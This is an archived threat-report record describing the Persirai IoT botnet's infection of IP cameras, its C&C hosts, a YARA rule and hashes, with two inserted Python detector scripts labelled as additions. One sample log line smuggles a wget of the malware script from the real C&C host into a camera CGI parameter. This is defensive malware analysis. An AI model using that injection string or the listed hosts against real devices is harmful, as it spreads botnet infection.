{
	"id": "af8f6f01-c1b3-4978-8f52-37d2b7278606",
	"created_at": "2026-04-06T00:10:37.452495Z",
	"updated_at": "2026-04-10T03:30:57.158426Z",
	"deleted_at": null,
	"sha1_hash": "4922da04d63105ac727a980898b79cd96bb6dd8b",
	"title": "Persirai: New IoT Botnet Targets IP Cameras",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 78804,
	"plain_text": "Persirai: New IoT Botnet Targets IP Cameras\r\nBy: Tim Yeh, Dove Chiu, Kenney Lu, May 09, 2017. Read time: 4 min (1147 words)\r\nPublished: 2017-05-09 · Archived: 2026-04-05 15:41:40 UTC\r\nUpdated on May 10, 2017, 6:52 PM (UTC-7): We updated the source code and made changes to Figures 4 and 6.\r\nA new Internet of Things (IoT) botnet called Persirai (detected by Trend Micro as ELF_PERSIRAI.A) has been discovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment Manufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor malware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks that compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the Hajime botnet.\r\nUsing Shodan, we detected approximately 120,000 IP cameras that are vulnerable to ELF_PERSIRAI.A. Many of the owners of these vulnerable devices are unaware that their IP Cameras are exposed to the internet.\r\nFigure 1: The number of vulnerable IP Cameras as of April 26, 2017 (derived from Shodan data)\r\nThis makes it significantly easier for the perpetrators behind the malware to gain access to the IP Camera web interface via TCP Port 81.\r\nBehavior and Analysis\r\nFigure 2: Infection Flow of ELF_PERSIRAI.A\r\nIP Cameras typically use Universal Plug and Play (UPnP), a set of network protocols that lets a device open a port on the router and act as a server, which makes them highly visible targets for IoT malware.\r\nAfter logging into the vulnerable interface, the attacker can perform a command injection to force the IP Camera to connect to a download site via the following command:\r\n[Figure: the injected command]\r\nThe download site will then respond with the following commands:\r\n[Figure: the download site's response]\r\nThese commands download and execute a malicious shell script (wificam.sh) from the domain ntp.gtpnet.ir. The wificam.sh script 
will download and execute the following samples, which are deleted after execution:\r\nhttp://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/\r\nPage 1 of 4\n\n[Figure: samples downloaded by wificam.sh]\r\nAfter the samples are downloaded and executed, the malware deletes itself from disk and runs only in memory. It also blocks the zero-day exploit by pointing ftpupdate.sh and ftpupload.sh to /dev/null, which prevents other attackers from targeting the victim’s IP Camera through the same vulnerability. This change is not persistent: once the camera is rebooted, it is again vulnerable to the exploit.\r\nThe affected IP Camera reports to the C\u0026C servers:\r\nload[.]gtpnet[.]ir\r\nntp[.]gtpnet[.]ir\r\n185[.]62[.]189[.]232\r\n95[.]85[.]38[.]103\r\nAfter receiving commands from the server, the IP Camera automatically starts attacking other IP Cameras by exploiting a zero-day vulnerability that was made public a few months ago. An attacker exploiting this vulnerability can retrieve the password file from the device, which provides the means to perform command injection regardless of password strength (the Home Network Security signatures listed at the end of this post cover the GoAhead system.ini information disclosure, CVE-2017-5674).\r\nA sample of the payload is shown below:\r\nFigure 3: ELF_PERSIRAI.A sample payload\r\nThe IP Camera then receives a command from the C\u0026C server instructing it to perform a DDoS attack on other hosts via User Datagram Protocol (UDP) floods. Notably, Persirai can carry out UDP DDoS attacks with SSDP packets without spoofing the source IP address.\r\nThe backdoor protocol can be seen below:\r\nFigure 4: C\u0026C server backdoor protocol\r\nThe red portions indicate communication from the C\u0026C server to the victim’s IP camera. They contain the attack commands and the DDoS target IP and port.\r\nFigure 5: Special characters used by Persirai\r\nThe C\u0026C servers we discovered were using the IR country code. 
We also found some special Persian characters which the malware author used.\r\nThe manufacturer of the IP Camera we used for the sample claimed that the latest firmware addressed the vulnerability, so we tried updating the firmware of the IP Camera. However, the firmware indicates that it is already running the latest version.\r\nFigure 6: IP Camera firmware\r\nConclusion and Mitigation\r\nMirai was the first malware that brought IoT security into the limelight; we also noted how its open-source nature gave it the potential to act as the core template upon which future IoT-centric malware will be built.\r\nAs the Internet of Things gains traction with ordinary users, cybercriminals may choose to move away from Network Time Protocol (NTP) and Domain Name System (DNS) servers for DDoS attacks, instead concentrating on vulnerable devices—an issue compounded by users that practice lax security measures.\r\nA large number of these attacks were caused by the use of the default password in the device interface. Thus, users should change their default password as soon as possible and use a strong password for their devices.\r\nHowever, as the password-stealing vulnerability mentioned above shows, a strong password alone does not guarantee device security. IP Camera owners should also implement other steps to ensure that their devices are protected from external attacks. 
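One such step, as an added example that is not part of the original post: review the HTTP access log of the camera (or of the proxy in front of it) for the request patterns of the infection chain described above. The CGI names (set_ftp.cgi, ftptest.cgi), the C2/download hosts and the signature themes (system.ini disclosure, telnetd) come from this post; the tab-separated log layout, the sample records and the exact URIs are constructed assumptions, and any public source address reaching TCP/81 is reported because that exposure is what Persirai relies on.

```python
# Added example, not code from the original post: flags the request
# patterns of the Persirai chain in a camera or proxy HTTP log. The log
# layout (tab-separated ts, src, dst, dport, method, uri) and the exact
# URIs are assumptions; the CGI names, C2 hosts and signature themes
# (system.ini disclosure, telnetd) are taken from the post.
import ipaddress
from urllib.parse import unquote

TAB = chr(9)
C2_INDICATORS = ['load.gtpnet.ir', 'ntp.gtpnet.ir', '185.62.189.232', '95.85.38.103']
INJECT_CGIS = ['set_ftp.cgi', 'ftptest.cgi']   # $s1/$s2 in the post's YARA rule
SHELL_META = [';', '|', '&&', '`', '$(']        # checked after percent-decoding
# RFC 1918 plus loopback/link-local; adjust for your site's address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16',
                  '127.0.0.0/8', '169.254.0.0/16')]

R_DISCLOSURE = 'password-file disclosure attempt (system.ini)'
R_INJECTION = 'command injection via FTP-settings CGI'
R_TELNETD = 'shell spawning attempt via telnetd'
R_C2 = 'reference to Persirai download/C2 host'
R_EXPOSED = 'external client on TCP/81 (camera UI exposed to the Internet)'

def is_external(addr):
    '''True for a parseable address outside the internal ranges above.'''
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)

def check_request(src, dport, uri):
    '''Return the detection reasons for one request (empty list = nothing seen).'''
    reasons = []
    decoded = unquote(uri)      # so %3B and friends cannot hide metacharacters
    lower = decoded.lower()
    if 'system.ini' in lower:
        reasons.append(R_DISCLOSURE)
    if any(c in lower for c in INJECT_CGIS) and any(m in decoded for m in SHELL_META):
        reasons.append(R_INJECTION)
    if 'telnetd' in lower:
        reasons.append(R_TELNETD)
    if any(h in lower for h in C2_INDICATORS):
        reasons.append(R_C2)
    if dport == 81 and is_external(src):
        reasons.append(R_EXPOSED)
    return reasons

def parse_line(line):
    '''Parse one record of the assumed TSV layout; None for header, blank or malformed lines.'''
    if not line.strip() or line.startswith('#'):
        return None
    parts = line.rstrip().split(TAB)
    if len(parts) != 6 or not parts[3].isdigit():
        return None
    ts, src, dst, dport, method, uri = parts
    return {'ts': ts, 'src': src, 'dst': dst, 'dport': int(dport), 'method': method, 'uri': uri}

def analyze(log_text):
    '''Return (ts, src, uri, reasons) for every flagged record.'''
    alerts = []
    for line in log_text.split(chr(10)):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = check_request(rec['src'], rec['dport'], rec['uri'])
        if reasons:
            alerts.append((rec['ts'], rec['src'], rec['uri'], reasons))
    return alerts

# Constructed sample log (not captured traffic); 192.168.1.50:81 is the camera.
SAMPLE_LOG = chr(10).join(TAB.join(r) for r in [
    ('#ts', 'src', 'dst', 'dport', 'method', 'uri'),
    ('2017-04-26T10:00:01Z', '192.168.1.20', '192.168.1.50', '81', 'GET', '/live.htm'),
    ('2017-04-26T10:00:02Z', '203.0.113.7', '192.168.1.50', '81', 'GET', '/system.ini'),
    ('2017-04-26T10:00:03Z', '203.0.113.7', '192.168.1.50', '81', 'GET',
     '/set_ftp.cgi?svr=192.168.1.1&user=x%3Bwget%20http%3A%2F%2Fntp.gtpnet.ir%2Fwificam.sh'),
    ('2017-04-26T10:00:04Z', '198.51.100.9', '192.168.1.50', '81', 'GET', '/ftptest.cgi?svr=1.2.3.4'),
])

if __name__ == '__main__':
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The internal ranges are listed explicitly rather than taken from ipaddress's is_private, because that property also treats the documentation networks (203.0.113.0/24 and friends) as private, which would silently hide the exposure finding during testing.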
In addition to using a strong password, users should also disable UPnP on their routers to prevent devices within the network from opening ports to the external Internet without any warning.\r\nThe burden of IoT security does not rest on the user alone—it's also dependent on the vendors themselves, as they should be the ones responsible for making sure that their devices are secure and always updated. In line with this, users should make sure that their devices are always updated with the latest firmware to minimize the chance of vulnerability exploits.\r\nTrend Micro Solutions\r\nIn addition to the best practices mentioned above, users can look into solutions such as Trend Micro™ Security and Trend Micro Internet Security, which offer effective protection against threats to IoT devices using security features that can detect malware at the endpoint level. Connected devices are protected by security solutions such as Trend Micro Home Network Security, which can check internet traffic between the router and all connected devices. 
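As an added example that is not Trend Micro's code: the YARA rule and the SHA-256 hashes given below can be applied without a YARA engine, which matters on the camera itself or on a small NAS where yara-python cannot be installed. The following Python re-implements the rule's condition (ELF magic, size under 300 KB, YARA fullword semantics for the $x/$s strings) and checks file hashes against the post's IoC list; the sample blobs are constructed, not real samples.

```python
# Added example, not code from the original post: re-implements the
# Persirai YARA rule's condition and the SHA-256 IoC list from this
# page in plain Python, for hosts where yara-python is unavailable.
import hashlib
import os
import sys

# (needle, fullword) pairs copied from the YARA rule's $x and $s sets.
X_STRINGS = [(b'ftpupload.sh', True), (b'/dev/misc/watchdog', True),
             (b'/dev/watchdog', False), (b':52869/picsdesc.xml', True),
             (b'npxXoudifFeEgGaACScs', True)]
S_STRINGS = [(b'ftptest.cgi', True), (b'set_ftp.cgi', True),
             (b'2580e538f3723927f1ea2fdb8d57b99e9cc37ced1', True),
             (b'023ea8c671c0abf77241886465200cf81b1a2bf5e', True)]
# SHA-256 hashes the post lists as detected ELF_PERSIRAI.A.
KNOWN_HASHES = set('''
d00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45
f974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a
af4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb
aa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61
4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a
44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778
a58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92
7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0
4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b
264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc
ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c
ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f
f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489
e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c
35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32
'''.split())
ELF_MAGIC16 = bytes.fromhex('7f45')  # uint16(0) == 0x457f, read little-endian
MAX_SIZE = 300 * 1024                 # filesize < 300KB

def _is_alnum(byte):
    return (48 <= byte <= 57) or (65 <= byte <= 90) or (97 <= byte <= 122)

def contains(data, needle, fullword):
    '''Substring search; with fullword the neighbours must be non-alphanumeric (YARA semantics).'''
    start = 0
    while True:
        i = data.find(needle, start)
        if i < 0:
            return False
        if not fullword:
            return True
        end = i + len(needle)
        before_ok = i == 0 or not _is_alnum(data[i - 1])
        after_ok = end == len(data) or not _is_alnum(data[end])
        if before_ok and after_ok:
            return True
        start = i + 1

def matches_rule(data):
    '''uint16(0) == 0x457f and filesize < 300KB and ((1 of $x and 1 of $s) or 2 of $s).'''
    if not data.startswith(ELF_MAGIC16) or len(data) >= MAX_SIZE:
        return False
    x_hits = sum(1 for s, fw in X_STRINGS if contains(data, s, fw))
    s_hits = sum(1 for s, fw in S_STRINGS if contains(data, s, fw))
    return (x_hits >= 1 and s_hits >= 1) or s_hits >= 2

def classify(data):
    '''Return the reasons a blob is flagged (empty list means nothing matched).'''
    reasons = []
    if hashlib.sha256(data).hexdigest() in KNOWN_HASHES:
        reasons.append('sha256 is a published ELF_PERSIRAI.A hash')
    if matches_rule(data):
        reasons.append('matches Persirai YARA rule logic')
    return reasons

def scan_dir(root):
    '''Walk a tree (an extracted firmware image, a mounted camera filesystem) and collect hits.'''
    hits = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, 'rb') as fh:
                    data = fh.read()
            except OSError:
                continue
            reasons = classify(data)
            if reasons:
                hits[path] = reasons
    return hits

# Constructed blobs (not real samples): ELF magic followed by rule strings.
SAMPLE_HIT = ELF_MAGIC16 + b'LF' + bytes(12) + b' ftptest.cgi set_ftp.cgi /dev/watchdog '
SAMPLE_MISS = ELF_MAGIC16 + b'LF' + bytes(12) + b' ftptest.cgi alone is not enough '
SAMPLE_NOT_FULLWORD = ELF_MAGIC16 + b'LF xftptest.cgix xset_ftp.cgix'

if __name__ == '__main__':
    for path, why in scan_dir(sys.argv[1] if len(sys.argv) > 1 else '.').items():
        print(path, why)
```

Run it with the directory to scan as the first argument. Note that the YARA rule only fires on files under 300 KB and with an ELF header, so the hash check is what catches a sample that has been padded or wrapped; the two checks complement each other.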
In addition, enterprises can monitor all ports and network protocols to detect advanced threats and protect from targeted attacks via Trend Micro™ Deep Discovery™ Inspector.\r\nDeep Discovery Inspector protects customers from this threat via these DDI Rules:\r\nDDI beta rule 3664: \"IP Camera Remote Code Execution - HTTP (Request)\"\r\nDDI beta rule 3665: \"IP Camera Authentication Bypass - HTTP (Request)\"\r\nUsers with Trend Micro Home Network Security are protected via the following signatures:\r\n1133578 WEB GoAhead system.ini Information Disclosure Vulnerability -1 (CVE-2017-5674)\r\n1133642 WEB GoAhead system.ini Information Disclosure Vulnerability -2 (CVE-2017-5674)\r\n1133641 WEB Shell Spawning Attempt via telnetd -1.u\r\nThe Yara rule for detection is provided below:\r\nrule Persirai {\r\n    meta:\r\n        description = \"Detects Persirai Botnet Malware\"\r\n        author = \"Tim Yeh\"\r\n        reference = \"Internal Research\"\r\n        date = \"2017-04-21\"\r\n        hash1 = \"f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489\"\r\n        hash2 = \"e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c\"\r\n        hash3 = \"35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32\"\r\n        hash4 = \"ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c\"\r\n        hash5 = \"ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f\"\r\n    strings:\r\n        $x1 = \"ftpupload.sh\" fullword ascii\r\n        $x2 = \"/dev/misc/watchdog\" fullword ascii\r\n        $x3 = \"/dev/watchdog\" ascii\r\n        $x4 = \":52869/picsdesc.xml\" fullword ascii\r\n        $x5 = \"npxXoudifFeEgGaACScs\" fullword ascii\r\n        $s1 = \"ftptest.cgi\" fullword ascii\r\n        $s2 = \"set_ftp.cgi\" fullword ascii\r\n        $s3 = \"2580e538f3723927f1ea2fdb8d57b99e9cc37ced1\" fullword ascii\r\n        $s4 = \"023ea8c671c0abf77241886465200cf81b1a2bf5e\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x457f and filesize \u003c 300KB and ( ( 1 of ($x*) and 1 of ($s*) ) or 2 of ($s*) )\r\n}\r\nRelated SHA256 Hashes detected as ELF_PERSIRAI.A:\r\nd00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45\r\nf974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a\r\naf4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb\r\naa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61\r\n4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a\r\n44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778\r\na58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92\r\n7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0\r\n4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b\r\n264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc\r\nff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c\r\nec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f\r\nf736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489\r\ne0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c\r\n35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32\r\nSource: http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/"
	],
	"report_names": [
		"persirai-new-internet-things-iot-botnet-targets-ip-cameras"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434237,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4922da04d63105ac727a980898b79cd96bb6dd8b.pdf",
		"text": "https://archive.orkl.eu/4922da04d63105ac727a980898b79cd96bb6dd8b.txt",
		"img": "https://archive.orkl.eu/4922da04d63105ac727a980898b79cd96bb6dd8b.jpg"
	}
}